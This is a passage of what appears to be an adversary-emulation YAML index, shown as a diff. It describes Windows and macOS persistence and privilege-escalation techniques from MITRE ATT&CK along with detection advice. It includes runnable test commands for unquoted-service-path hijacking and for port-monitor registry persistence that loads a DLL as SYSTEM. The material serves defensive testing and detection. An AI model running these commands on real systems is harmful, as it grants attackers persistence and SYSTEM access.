If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. + + For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. + + ### Search Order Hijacking + Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. + + For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. 
(Citation: MSDN Environment Property) + + Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). + external_references: + - source_name: mitre-attack + external_id: T1034 + url: https://attack.mitre.org/techniques/T1034 + - external_id: CAPEC-159 + source_name: capec + url: https://capec.mitre.org/data/definitions/159.html + - url: https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/ + description: Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking + via .cmd or .bat file. Retrieved July 25, 2016. + source_name: TechNet MS14-019 + - url: http://support.microsoft.com/KB/103000 + description: Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. + Retrieved November 30, 2014. + source_name: Microsoft Subkey + - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 + description: Baggett, M. (2012, November 8). Help eliminate unquoted path + vulnerabilities. Retrieved December 4, 2014. + source_name: Baggett 2012 + - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ + description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted + Services. Retrieved August 10, 2018. + source_name: SecurityBoulevard Unquoted Services APR 2018 + - url: https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ + description: McFarland, R. (2018, January 26). Windows Privilege Escalation + Guide. Retrieved August 10, 2018. + source_name: SploitSpren Windows Priv Jan 2018 + - url: http://msdn.microsoft.com/en-us/library/ms682425 + description: Microsoft. (n.d.). CreateProcess function. Retrieved December + 5, 2014. + source_name: Microsoft CreateProcess + - url: http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120 + description: Hill, T. (n.d.). Windows NT Command Shell. 
Retrieved December + 5, 2014. + source_name: Hill NT Shell + - url: http://msdn.microsoft.com/en-us/library/ms687393 + description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. + source_name: Microsoft WinExec + - url: https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx + description: Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016. + source_name: MSDN Environment Property + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + revoked: false + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-07-06T18:49:35.645Z' + created: '2017-05-31T21:30:36.140Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_effective_permissions: + - User + - Administrator + - SYSTEM + x_mitre_detection: "Monitor file creation for files named after partial directories + and in locations that may be searched for common processes through the environment + variable, or otherwise should not be user writable. Monitor the executing + process for process executable paths that are named for partial directories. + Monitor file creation for programs that are named after Windows system programs + or programs commonly executed without a path (such as \"findstr,\" \"net,\" + and \"python\"). If this activity occurs outside of known administration activity, + upgrades, installations, or patches, then it may be suspicious. \n\nData and + events should not be viewed in isolation, but as part of a chain of behavior + that could lead to other activities, such as network connections made for + Command and Control, learning details about the environment through Discovery, + and Lateral Movement." 
+ x_mitre_contributors: + - Stefan Kanthak + x_mitre_version: '1.0' + x_mitre_deprecated: true + atomic_tests: [] + T1574.007: + technique: + created: '2020-03-13T14:10:43.424Z' + modified: '2020-09-16T16:56:34.583Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.007 + url: https://attack.mitre.org/techniques/T1574/007 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by PATH Environment Variable + description: |- + Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. + + The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. 
If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. + + For example, if C:\example path precedes
C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. + id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + x_mitre_defense_bypassed: + - Application control + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows + atomic_tests: [] + T1574.008: + technique: + id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 + description: |- + Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. 
+ + Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. + + For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property) + + Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). 
+ name: Path Interception by Search Order Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.008 + url: https://attack.mitre.org/techniques/T1574/008 + - external_id: CAPEC-159 + source_name: capec + url: https://capec.mitre.org/data/definitions/159.html + - url: http://msdn.microsoft.com/en-us/library/ms682425 + description: Microsoft. (n.d.). CreateProcess function. Retrieved December + 5, 2014. + source_name: Microsoft CreateProcess + - source_name: Windows NT Command Shell + url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 + description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved + December 5, 2014. + - url: http://msdn.microsoft.com/en-us/library/ms687393 + description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. + source_name: Microsoft WinExec + - source_name: Microsoft Environment Property + url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN + description: Microsoft. (2011, October 24). Environment Property. Retrieved + July 27, 2016. 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:03:35.217Z' + created: '2020-03-13T17:48:58.999Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Stefan Kanthak + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: | + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
+ x_mitre_permissions_required: + - Administrator + - User + - SYSTEM + x_mitre_effective_permissions: + - Administrator + - SYSTEM + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1574.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.009 + url: https://attack.mitre.org/techniques/T1574/009 + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + - source_name: Microsoft CurrentControlSet Services + url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree + description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services + Registry Tree. Retrieved March 16, 2020. + - source_name: Help eliminate unquoted path + url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 + description: Mark Baggett. (2012, November 8). Help eliminate unquoted path + vulnerabilities. Retrieved November 8, 2012. + - source_name: Windows Unquoted Services + url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ + description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted + Services. Retrieved August 10, 2018. + - source_name: Windows Privilege Escalation Guide + url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ + description: absolomb. (2018, January 26). Windows Privilege Escalation Guide. + Retrieved August 10, 2018. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by Unquoted Path + description: |- + Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. 
Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. + + Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) + + This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. + id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:05:23.755Z' + created: '2020-03-13T13:51:58.519Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. 
Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows + identifier: T1574.009 + atomic_tests: + - name: Execution of program.exe as service with unquoted service path + auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f + description: | + When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability + known as Unquoted Service Path which allows a user to gain SYSTEM privileges. + In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. 
+ supported_platforms: + - windows + input_arguments: + service_executable: + description: Path of the executable used for the service and as the hijacked + program.exe + type: path + default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe + executor: + command: | + copy #{service_executable} "C:\Program Files\windows_service.exe" + copy #{service_executable} "C:\program.exe" + sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto + sc start "Example Service" + cleanup_command: | + sc stop "Example Service" >nul 2>&1 + sc delete "Example Service" >nul 2>&1 + del "C:\Program Files\windows_service.exe" >nul 2>&1 + del "C:\program.exe" >nul 2>&1 + del "C:\Time.log" >nul 2>&1 + name: command_prompt + elevation_required: true + T1547.011: + technique: + created: '2020-01-24T20:02:59.149Z' + modified: '2021-03-30T00:51:59.629Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1547.011 + url: https://attack.mitre.org/techniques/T1547/011 + - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ + description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). + Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. + source_name: Sofacy Komplex Trojan + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html + description: Apple. (2016, September 13). Adding Login Items. Retrieved July + 11, 2017. 
+ source_name: Adding Login Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. + source_name: OSX.Dok Malware + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Plist Modification + description: "Adversaries may modify plist files to run a program during system + boot or user login. Property list (plist) files contain all of the information + that macOS and OS X uses to configure applications and services. These files + are UTF-8 encoded and formatted like XML documents via a series of keys surrounded + by < >. They detail when programs should execute, file paths to the executables, + program arguments, required OS permissions, and many others. plists are located + in certain locations depending on their purpose such as /Library/Preferences + (which execute with elevated privileges) and ~/Library/Preferences + (which execute with a user's privileges). \n\nAdversaries can modify plist + files to execute their code as part of establishing persistence. plists may + also be used to elevate privileges since they may execute in the context of + another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for + execution at login is com.apple.loginitems.plist.(Citation: Methods + of Mac Malware Persistence) Applications under this plist run under the logged + in user's context, and will be started every time the user logs in. 
Login + items installed using the Service Management Framework are not visible in + the System Preferences and can only be removed by the application that created + them.(Citation: Adding Login Items) Users have direct control over login items + installed using a shared file list which are also visible in System Preferences + (Citation: Adding Login Items). Some of these applications can open visible + dialogs to the user, but they don’t all have to since there is an option to + \"hide\" the window. If an adversary can register their own login item or + modified an existing one, then they can use it to execute their code for a + persistence mechanism each time the user logs in (Citation: Malware Persistence + on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled + can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) + can do this as well. (Citation: Adding Login Items)" + id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. + + All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. 
Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) + + Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - macOS + identifier: T1547.011 + atomic_tests: + - name: Plist Modification + auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 + description: 'Modify MacOS plist file in one of two directories + +' + supported_platforms: + - macos + executor: + steps: | + 1. Modify a .plist in + + /Library/Preferences + + OR + + ~/Library/Preferences + + 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) + name: manual + T1556.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.003 + url: https://attack.mitre.org/techniques/T1556/003 + - source_name: Apple PAM + url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt + description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules. + Retrieved June 25, 2020. + - source_name: Man Pam_Unix + url: https://linux.die.net/man/8/pam_unix + description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June + 25, 2020. + - source_name: Red Hat PAM + url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules + description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES + (PAM). Retrieved June 25, 2020. + - source_name: PAM Backdoor + url: https://github.com/zephrax/linux-pam-backdoor + description: zephrax. (2018, August 3). linux-pam-backdoor. 
Retrieved June + 25, 2020. + - source_name: PAM Creds + url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/ + description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via + PAM backdoors & DNS requests. Retrieved June 26, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Pluggable Authentication Modules + description: |- + Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) + + Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor) + + Malicious modifications to the PAM system may also be abused to steal credentials. 
Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM) + id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:12:34.422Z' + created: '2020-06-26T04:01:09.648Z' + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - root + x_mitre_detection: |- + Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files. + + Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). 
+ x_mitre_data_sources: + - 'File: File Modification' + - 'Logon Session: Logon Session Creation' + x_mitre_contributors: + - Scott Knight, @sdotknight, VMware Carbon Black + - George Allen, VMware Carbon Black + x_mitre_platforms: + - Linux + - macOS + atomic_tests: [] + T1205.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1205.001 + url: https://attack.mitre.org/techniques/T1205/001 + - url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 + description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible + backdoor. Retrieved October 13, 2018.' + source_name: Hartrell cd00r 2002 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Port Knocking + description: |- + Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. + + This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. + + The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. 
+ id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-10-21T01:26:31.804Z' + created: '2020-07-01T18:23:25.002Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Record network packets sent to and from the system, looking + for extraneous packets that do not belong to established flows. + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + x_mitre_platforms: + - Linux + - macOS + - Windows + - Network + atomic_tests: [] + T1547.010: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.010 + url: https://attack.mitre.org/techniques/T1547/010 + - url: http://msdn.microsoft.com/en-us/library/dd183341 + description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12, + 2014. + source_name: AddMonitor + - url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf + description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint + slides]. Retrieved November 12, 2014. + source_name: Bloxham + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Port Monitors + description: "Adversaries may use port monitors to run an attacker supplied + DLL during system boot for persistence or privilege escalation. 
A port monitor + can be set through the AddMonitor API call to set a DLL to be + loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 + and will be loaded by the print spooler service, spoolsv.exe, on boot. The + spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) + Alternatively, an arbitrary DLL can be loaded if permissions allow writing + a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. + \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* + Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this + technique to load malicious code at startup that will persist on system reboot + and execute as SYSTEM." + id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-01-24T19:46:27.750Z' + created: '2020-01-24T19:46:27.750Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation: + AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are + abnormal. New DLLs written to the System32 directory that do not correlate + with known good software or patching may be suspicious. \n\nMonitor Registry + writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. 
+ Run the Autoruns utility, which checks for this Registry key as a persistence + mechanism (Citation: TechNet Autoruns)" + x_mitre_data_sources: + - 'File: File Creation' + - 'Process: OS API Execution' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_contributors: + - Stefan Kanthak + - Travis Smith, Tripwire + x_mitre_platforms: + - Windows + identifier: T1547.010 + atomic_tests: + - name: Add Port Monitor persistence in Registry + auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 + description: Add key-value pair to a Windows Port Monitor registry. On the subsequent + reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + supported_platforms: + - windows + input_arguments: + monitor_dll: + description: Addition to port monitor registry key. Normally refers to a + DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions + allow writing a fully-qualified pathname for that DLL. + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" + /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ + +' + cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" + +' + name: command_prompt + elevation_required: true + T1546.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.013 + url: https://attack.mitre.org/techniques/T1546/013 + - source_name: Microsoft About Profiles + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6 + description: Microsoft. (2017, November 29). About Profiles. Retrieved June + 14, 2019. + - source_name: ESET Turla PowerShell May 2019 + url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ + description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell + usage. Retrieved June 14, 2019. 
+ - source_name: Wits End and Shady PowerShell Profiles + url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html + description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege + Elevation using the Powershell Profile. Retrieved July 8, 2019.' + - url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf + description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING + CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. + source_name: Malware Archaeology PowerShell Cheat Sheet + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: PowerShell Profile + description: "Adversaries may gain persistence and elevate privileges by executing + malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) + is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) + starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) + supports several profiles depending on the user or host program. For example, + there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) + host programs such as the PowerShell console, PowerShell ISE or Visual Studio + Code. An administrator can also configure a profile that applies to all users + and host programs on the local computer. (Citation: Microsoft About Profiles) + \n\nAdversaries may modify these profiles to include arbitrary commands, functions, + modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) + drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) + session the modified script will be executed unless the -NoProfile + flag is used 